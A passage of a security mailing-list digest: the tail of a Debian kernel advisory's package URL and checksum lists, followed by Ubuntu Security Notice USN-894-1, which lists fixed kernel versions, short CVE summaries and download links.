http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 308138 34dbc7720b1844833f0b71aa307c37fa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 310714 6a2c6fbbc1dd000b8a532227e3b8b5ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 3939512 91c2ba626e754fe407d6dcf3fa01337a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 259624 ac09dcabb624984b7321a5f6b6dbef54 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83578 e152e18748e5c80b6d06715db836cf83 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 260838 44bc8ad5796c124b53d85a8c3a4ed912 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 262420 ff0641f04c409dd606c34373e8e16269 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83546 990eb24056c7f6a63a4d55ec39563bae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 3446386 6ebfa4544252648df48cfb085cc3d2cc http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 258962 75184bed1f0b42cd8e002f93ed42198a

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 3656680 c5499cb98cdcdcadc48e3aa5bdf1d379 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 346982 6a6a08f74f9690705e6d770d1f3f2566 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 359548 b10fe011746b0df5fbd2587292af34ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83452 32a1614212e964a4423b161b34cd758d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358212 58ba32b0701643f043ab38a487cae609 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83424 c1e8493aff96df5b0fe33f5af4686f98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358752 4e3e9ef18a14fd191444591df571f80c

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 3569470 9ae824064bfc785f4b3512db78119e46 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83432 64a48fa9283b1741e22f0a22dbb93b20 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83456 235a5572d5e109a4b575080a8262dc57 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 319938 d7dc0120458e93119879dcdd1e48017e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 320226 34731a37b519d726b133093e04d937c3

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248638 ce9da5c377d6328e9bb9be1c3945fff8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83600 a7b66d71779dea207a3d49cb9f692fdb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 313302 314b57dc807eb91f617c10b1497e1617 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 314602 2c127076bf189be2836a4c3a4c7736af http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83540 8acdb1b4a4bc57f55b9cc5b2b04043a4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 229412 0b93c7c909eca04fad4fa45e3e73e96c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248700 13266a2acd5fcbd75d11049dd5e5ad58 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 218314 4174dec1c73ca114469cbb88fba32926

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16567710 29d2ab68b4259a1822a2ca19e9494f5d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 309868 d69b27ef946f2ac62b115e0200fe8002 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 26988356 f0d885b353b15dc42e4e76da8a8fb129 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248150 7c585f74e0752a631050b13b9740c0c3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 13318088 0b0a8b724245ac10817b03c4cf734827 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83484 a678208f18017a9c87d45548916fd98e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 311392 5b1f0957a2756b04be6c95ae8ca5e2c8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 21736368 02da1a4e543b8c5082476b156281cb31 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 247968 929ca712a0aa0984f9dc2a6f68f405a5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 16632240 c9de1dfccb8a5cb5d5d652ca694a7108 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 3805532 be10a8b64da3adf7ece3846b0b0bf930 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 83434 ac0cb9b5939e4ea82c3c83a1a1d473ed http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248174 50e84058a7d710f013f92e1fe68a705c

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322474 2d7e39cf0b78d98125a0baba377f1af0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 324008 3b021bb4b3dac72dc68e701f4a209939 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 295928 ca2bf1c3c12f409e469c516877a8e91c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322502 4b76cce255e1fcc72cb82053cd34a1a2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83466 a041c0fdb383832cf725723ce22e40c0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83430 392d415932625b1a69dc6494d2f737e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 3674486 200fdcca2140a97f961a37d70db620d5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83532 a1c34683fe304f1a86bbc28f6cbc654c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83556 bf7fed1ef4da92d782409fe8345f861a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 6976486 5b5db16fea4336068bbcd5bff56ad575 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 7228452 75c044fa17d6071de36579a1491c2e1b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 3431908 18825f85900faca81b21e48d43af6ee7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 197006 0a44248e77ec1ff027edd032ebe5b2c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 1503494 bd7f7b7bd4e120472bf60ad0b7d9184e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 196810 f03114c2f256a97b15f88d2659f9501b

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83428 1ea7179752fbb45e10e731991583db68 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 263546 ef894d6917cbe692ec9197048538d5e7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 3651402 a0194c650712040f81e97d5b3b62bc79 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 264892 0b642e20f00b52c20b6ae9e0ee1f78b8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83442 6d109d7f131dab564736e2ac6a85dd29 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7

These changes will probably be included in the oldstable distribution on its next update. =========================================================== Ubuntu Security Notice USN-894-1 February 05, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138, CVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538, CVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.82 linux-image-2.6.15-55-686 2.6.15-55.82 linux-image-2.6.15-55-amd64-generic 2.6.15-55.82 linux-image-2.6.15-55-amd64-k8 2.6.15-55.82 linux-image-2.6.15-55-amd64-server 2.6.15-55.82 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.82 linux-image-2.6.15-55-hppa32 2.6.15-55.82 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.82 linux-image-2.6.15-55-hppa64 2.6.15-55.82 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.82 linux-image-2.6.15-55-itanium 2.6.15-55.82 linux-image-2.6.15-55-itanium-smp 2.6.15-55.82 linux-image-2.6.15-55-k7 2.6.15-55.82 linux-image-2.6.15-55-mckinley 2.6.15-55.82 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc 2.6.15-55.82 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.82 linux-image-2.6.15-55-server 2.6.15-55.82 linux-image-2.6.15-55-server-bigiron 2.6.15-55.82 linux-image-2.6.15-55-sparc64 2.6.15-55.82 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.82

Ubuntu 8.04 LTS: linux-image-2.6.24-27-386 2.6.24-27.65 linux-image-2.6.24-27-generic 2.6.24-27.65 linux-image-2.6.24-27-hppa32 2.6.24-27.65 linux-image-2.6.24-27-hppa64 2.6.24-27.65 linux-image-2.6.24-27-itanium 2.6.24-27.65 linux-image-2.6.24-27-lpia 2.6.24-27.65 linux-image-2.6.24-27-lpiacompat 2.6.24-27.65 linux-image-2.6.24-27-mckinley 2.6.24-27.65 linux-image-2.6.24-27-openvz 2.6.24-27.65 linux-image-2.6.24-27-powerpc 2.6.24-27.65 linux-image-2.6.24-27-powerpc-smp 2.6.24-27.65 linux-image-2.6.24-27-powerpc64-smp 2.6.24-27.65 linux-image-2.6.24-27-rt 2.6.24-27.65 linux-image-2.6.24-27-server 2.6.24-27.65 linux-image-2.6.24-27-sparc64 2.6.24-27.65 linux-image-2.6.24-27-sparc64-smp 2.6.24-27.65 linux-image-2.6.24-27-virtual 2.6.24-27.65 linux-image-2.6.24-27-xen 2.6.24-27.65

Ubuntu 8.10: linux-image-2.6.27-17-generic 2.6.27-17.45 linux-image-2.6.27-17-server 2.6.27-17.45 linux-image-2.6.27-17-virtual 2.6.27-17.45

Ubuntu 9.04: linux-image-2.6.28-18-generic 2.6.28-18.59 linux-image-2.6.28-18-imx51 2.6.28-18.59 linux-image-2.6.28-18-iop32x 2.6.28-18.59 linux-image-2.6.28-18-ixp4xx 2.6.28-18.59 linux-image-2.6.28-18-lpia 2.6.28-18.59 linux-image-2.6.28-18-server 2.6.28-18.59 linux-image-2.6.28-18-versatile 2.6.28-18.59 linux-image-2.6.28-18-virtual 2.6.28-18.59

Ubuntu 9.10: kernel-image-2.6.31-108-imx51-di 2.6.31-108.21 linux-image-2.6.31-19-386 2.6.31-19.56 linux-image-2.6.31-19-generic 2.6.31-19.56 linux-image-2.6.31-19-generic-pae 2.6.31-19.56 linux-image-2.6.31-19-ia64 2.6.31-19.56 linux-image-2.6.31-19-lpia 2.6.31-19.56 linux-image-2.6.31-19-powerpc 2.6.31-19.56 linux-image-2.6.31-19-powerpc-smp 2.6.31-19.56 linux-image-2.6.31-19-powerpc64-smp 2.6.31-19.56 linux-image-2.6.31-19-server 2.6.31-19.56 linux-image-2.6.31-19-sparc64 2.6.31-19.56 linux-image-2.6.31-19-sparc64-smp 2.6.31-19.56 linux-image-2.6.31-19-virtual 2.6.31-19.56 linux-image-2.6.31-211-dove 2.6.31-211.22 linux-image-2.6.31-211-dove-z0 2.6.31-211.22 linux-image-2.6.31-304-ec2 2.6.31-304.10

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06) the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. Ubuntu 9.10 was not affected. (CVE-2009-4021)

It was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. Ubuntu 6.06 was not affected. (CVE-2009-4138)

Tavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)

Neil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. (CVE-2009-4536, CVE-2009-4538)

It was discovered that "print-fatal-signals" reporting could show arbitrary kernel memory contents. (CVE-2010-0003)

Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. Only Ubuntu 9.04 and 9.10 were affected. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0291)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz
  Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc
  Size/MD5:     2921 682576890de917043eccf6fc9398aed2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb
  Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb
  Size/MD5:    96386 b184441d2f44037554d037d217688393
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb
  Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     2312 d464c76f98a4142add7a69aca1305739
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49160 a512718368004f81e83063ea8972c871
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36776 fcb0833daefa645545a2451824094b21
